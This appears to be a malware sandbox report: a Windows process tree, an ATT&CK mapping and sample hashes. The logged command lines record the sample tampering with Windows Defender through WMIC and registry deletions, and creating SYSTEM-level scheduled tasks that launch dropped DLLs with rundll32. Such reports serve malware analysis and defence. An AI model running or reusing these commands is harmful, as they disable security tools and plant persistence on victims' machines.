- Modifies data under HKEY_USERS
PID:13472 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:12156
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bEwGusBEGbIeKSSfjR"3⤵PID:18276
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:18416
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:18492
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:18552
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:18824
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TdgVoScrU\eBdHDq.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "xSbgDCImQNdWYmB" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:6160 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xSbgDCImQNdWYmB2" /F /xml "C:\Program Files (x86)\TdgVoScrU\XWmwawu.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:7504 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "xSbgDCImQNdWYmB"3⤵PID:11876
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xSbgDCImQNdWYmB"3⤵PID:10036
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FzvIgGdeRLcgbM" /F /xml "C:\Program Files (x86)\xmhVlMznYVRU2\SCroPrS.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:11580 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rRYXbmmYjIvrG2" /F /xml "C:\ProgramData\mrnDKDtAoCXFymVB\lEUnNru.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:10672 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DVpMShOGhTVXDiVCZ2" /F /xml "C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\dXZipRN.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:10996 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LdVsjAprHUXUOtSHAnG2" /F /xml "C:\Program Files (x86)\FAROrqqmwDJuC\rzJfHCg.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:8936 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lDWDrPZYJQBuPmKYQ" /SC once /ST 12:26:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\fIDQkgvqEeYuFUPy\XiOEFUDs\hZTBWZO.dll\",#1 /site_id 668658" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:13200 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "lDWDrPZYJQBuPmKYQ"3⤵PID:9804
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spummIlXAdpq" /SC once /ST 19:28:51 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\zGfATNLg\NYaOvet.exe\" RA /S"3⤵
- Creates scheduled task(s)
PID:17252 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spummIlXAdpq"3⤵PID:13620
-
C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\USNydSz.exeC:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\USNydSz.exe 4h /site_id 668658 /S2⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in Program Files directory
PID:12068 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:10596
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:10976
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:1464
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:19048 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:8048
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:10424
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:15296
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7828 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:8524
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵
- Loads dropped DLL
PID:11204 -
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:14612
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Modifies data under HKEY_USERS
PID:16716 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:18048
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:9528
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:19316
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
PID:11492 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:12796
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bEwGusBEGbIeKSSfjR"3⤵PID:7744
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:8804
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:4964
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:10504
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:6388
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TdgVoScrU\wMaCDE.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "xSbgDCImQNdWYmB" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:11260 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xSbgDCImQNdWYmB2" /F /xml "C:\Program Files (x86)\TdgVoScrU\rBozWuM.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:6480 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "xSbgDCImQNdWYmB"3⤵PID:8848
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "xSbgDCImQNdWYmB"3⤵PID:10408
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FzvIgGdeRLcgbM" /F /xml "C:\Program Files (x86)\xmhVlMznYVRU2\qGspXwE.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:13328 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:10608
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rRYXbmmYjIvrG2" /F /xml "C:\ProgramData\mrnDKDtAoCXFymVB\bXpZfqi.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:12112 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "DVpMShOGhTVXDiVCZ2" /F /xml "C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\pNKBWUu.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:13592 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LdVsjAprHUXUOtSHAnG2" /F /xml "C:\Program Files (x86)\FAROrqqmwDJuC\MSPKFlJ.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:8596 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuMTubdtfoo" /SC once /ST 08:36:54 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\GebyjqhU\vuUZBai.exe\" RA /S"3⤵
- Creates scheduled task(s)
PID:13932 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuMTubdtfoo"3⤵PID:13288
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\fIDQkgvqEeYuFUPy\XiOEFUDs\hZTBWZO.dll",#1 /site_id 6686582⤵PID:8512
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\fIDQkgvqEeYuFUPy\XiOEFUDs\hZTBWZO.dll",#1 /site_id 6686583⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:8960 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "lDWDrPZYJQBuPmKYQ"4⤵PID:13724
-
C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\zGfATNLg\NYaOvet.exeC:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\zGfATNLg\NYaOvet.exe RA /S2⤵PID:12652
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:18320
-
C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\GebyjqhU\vuUZBai.exeC:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\GebyjqhU\vuUZBai.exe RA /S2⤵PID:11372
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:17960
-
C:\Users\Admin\AppData\Roaming\aeghuggC:\Users\Admin\AppData\Roaming\aeghugg2⤵PID:16012
-
C:\Users\Admin\AppData\Roaming\ctghuggC:\Users\Admin\AppData\Roaming\ctghugg2⤵PID:15960
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:988
-
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20bc9ea26f.exeThu20bc9ea26f.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2216
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2384 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵PID:3484
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe (depth 1)
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID: 5824

C:\Windows\system32\browser_broker.exe (depth 1)
  Command line: C:\Windows\system32\browser_broker.exe -Embedding
  - Modifies Internet Explorer settings
  PID: 4436

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  PID: 7080

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Modifies registry class
  PID: 4084

C:\Windows\system32\msiexec.exe (depth 1)
  Command line: C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Modifies registry class
  PID: 6344

  C:\Windows\syswow64\MsiExec.exe (depth 2)
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding 5FE56DEFAC11A73349E4383CF6185F62 C
    - Loads dropped DLL
    PID: 6900

  C:\Windows\syswow64\MsiExec.exe (depth 2)
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding F21845CC647FC8DDA45ED6A9D3334C88
    - Blocklisted process makes network request
    - Loads dropped DLL
    PID: 6840

    C:\Windows\SysWOW64\taskkill.exe (depth 3)
      Command line: "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
      - Kills process with taskkill
      PID: 9724

  C:\Windows\syswow64\MsiExec.exe (depth 2)
    Command line: C:\Windows\syswow64\MsiExec.exe -Embedding C02DE23DF62EEC4B34246EF20B9EB67B E Global\MSI0000
    - Loads dropped DLL
    PID: 60

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class
  PID: 6268

C:\Windows\system32\rundll32.exe (depth 1)
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
  PID: 5540

  C:\Windows\SysWOW64\rundll32.exe (depth 2)
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Loads dropped DLL
    PID: 6908

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  PID: 6976

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update
  PID: 11012

  C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe (depth 2)
    Command line: C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess
    PID: 14896

C:\Windows\system32\WerFault.exe (depth 1)
  Command line: "C:\Windows\system32\WerFault.exe" -k -lc PDCRevocation PDCRevocation-20210916-2117.dmp
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Modifies data under HKEY_USERS
  PID: 3360

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe (depth 1)
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  PID: 12732

C:\Windows\system32\browser_broker.exe (depth 1)
  Command line: C:\Windows\system32\browser_broker.exe -Embedding
  PID: 12580

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe (depth 1)
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID: 7916

C:\Windows\system32\browser_broker.exe (depth 1)
  Command line: C:\Windows\system32\browser_broker.exe -Embedding
  - Modifies Internet Explorer settings
  PID: 18908

\??\c:\windows\system32\svchost.exe (depth 1)
  Command line: c:\windows\system32\svchost.exe -k netsvcs -s seclogon
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  PID: 14432

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  PID: 14924

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  - Modifies registry class
  PID: 15352

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  PID: 17320

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class
  PID: 11576

C:\Windows\system32\rundll32.exe (depth 1)
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
  PID: 13444

  C:\Windows\SysWOW64\rundll32.exe (depth 2)
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    - Loads dropped DLL
    PID: 15972

C:\Windows\SysWOW64\rundll32.exe (depth 1)
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Loads dropped DLL
  PID: 18188

C:\Windows\system32\rundll32.exe (depth 1)
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  - Process spawned unexpected child process
  PID: 18312

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Drops file in Windows directory
  - Modifies registry class
  PID: 2064

C:\Windows\SysWOW64\cmd.exe (depth 1)
  Command line: /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
  PID: 10584

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
    - Modifies data under HKEY_USERS
    PID: 10764

    C:\Windows\SysWOW64\Wbem\WMIC.exe (depth 3)
      Command line: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
      PID: 11620

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe (depth 1)
  Command line: "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
  - Modifies registry class
  PID: 15576
MITRE ATT&CK Enterprise v6

Persistence
- Modify Existing Service (2)
- New Service (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)

Defense Evasion
- Disabling Security Tools (1)
- File and Directory Permissions Modification (1)
- Install Root Certificate (1)
- Modify Registry (4)
- Virtualization/Sandbox Evasion (1)
- Web Service (1)
Downloads

MD5: aa401083ed0541cf1c925148ccae915d
SHA1: 1b61fb568cb6b6a44a2c085086cd7129027f765e
SHA256: c5ac60e57d1eca04d780b51192614f05f4fcc24dc55ab3c387ff74a777691265
SHA512: b881c769f533c39e6b505864e8b056a962f37df12a47a4adb88831fa87e7b07b954c6128145b83c182b7ced55b830b3b25140054504e8cd2f68bfdbf974fc1d6

MD5: aa401083ed0541cf1c925148ccae915d
SHA1: 1b61fb568cb6b6a44a2c085086cd7129027f765e
SHA256: c5ac60e57d1eca04d780b51192614f05f4fcc24dc55ab3c387ff74a777691265
SHA512: b881c769f533c39e6b505864e8b056a962f37df12a47a4adb88831fa87e7b07b954c6128145b83c182b7ced55b830b3b25140054504e8cd2f68bfdbf974fc1d6

MD5: 02a6578c06716ab57586f1ceadc6517c
SHA1: eb851569086155e2639024af3d1de259b7378f26
SHA256: 46888e6b881d99d9bf3643bb16aaf1a850c16905ebd8fd7be3e9e1bb5fb868e8
SHA512: 3b531d57623d86a9d3b4f5ac86901dac3f743758e41e89c211d9e5cabc5c2fc6ef5744863768ba80a9e8d9a98c178fa02978036be959ba0bb4c7d0631f907eed

MD5: 02a6578c06716ab57586f1ceadc6517c
SHA1: eb851569086155e2639024af3d1de259b7378f26
SHA256: 46888e6b881d99d9bf3643bb16aaf1a850c16905ebd8fd7be3e9e1bb5fb868e8
SHA512: 3b531d57623d86a9d3b4f5ac86901dac3f743758e41e89c211d9e5cabc5c2fc6ef5744863768ba80a9e8d9a98c178fa02978036be959ba0bb4c7d0631f907eed

